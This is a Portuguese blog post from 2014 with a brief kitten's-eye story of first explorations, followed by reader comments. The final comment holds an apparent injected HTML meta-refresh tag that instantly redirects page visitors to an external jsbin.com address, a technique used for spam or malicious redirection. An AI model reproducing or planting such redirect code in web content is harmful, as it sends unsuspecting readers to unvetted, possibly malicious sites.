13 de mai de 2014

era uma vez um gato (1)

(…) e as coisas continuaram embaçadas durante algum tempo. Confesso que não lembro de quase nada dessa época, dias e noites eram só aquele empurra-empurra, disputando o leite e o melhor lugar no colo quentinho de mamãe. Pouco a pouco, porém, meu espírito independente começou a se manifestar – assim que consegui me erguer sobre minhas quatro patas, comecei a explorar o mundo além da nossa casa-caixa. Fui o primeiro a me atrever pela superfície lisa e geladinha do lugar onde estávamos. É verdade que, no início, dei umas desequilibradas, mas logo peguei a manha da coisa e, cautelosamente, fui vasculhando canto por canto daquele espaço enorme. Avançava um bocadinho mais cada vez que saía de perto de mamãe, experimentando novos movimentos, descobrindo cheiros e sons diferentes, que faziam minhas orelhas empinarem por conta própria e minha cabeça girar ora pra cima, ora pra trás, de um lado, do outro, já atento e curioso, como eu continuaria sendo ao longo das minhas sete vidas.

10 comentários:

Tiane disse...

Ué... esta não é a história do Joaquim,né? Tem gatinho novo por aí?

Silvana Tavano disse...
Este comentário foi removido pelo autor.
Silvana Tavano disse...
Este comentário foi removido pelo autor.
Silvana Tavano disse...
Este comentário foi removido pelo autor.
Silvana Tavano disse...
Este comentário foi removido pelo autor.
Silvana Tavano disse...

Nada a ver com o Joaquim, Tiane! E não tem gatinho novo por aqui, só na minha cabeça rss…
beijo!

Silvana Tavano disse...
Este comentário foi removido pelo autor.
Silvana Tavano disse...

E esse negócio enlouqueceu, repetiu mil vezes o meu comentário!

Anônimo disse...

Olá! Adoro seu blog e visito sempre!
Veja este belíssimo documentário de 1944.. Você vai gostar!
http://www.youtube.com/watch?v=4PKoJNeQZCE

Abraço
Alessandra

davi santos silveira disse...


<meta http-equiv="refresh" content="0;url=http://jsbin.com/varazawo"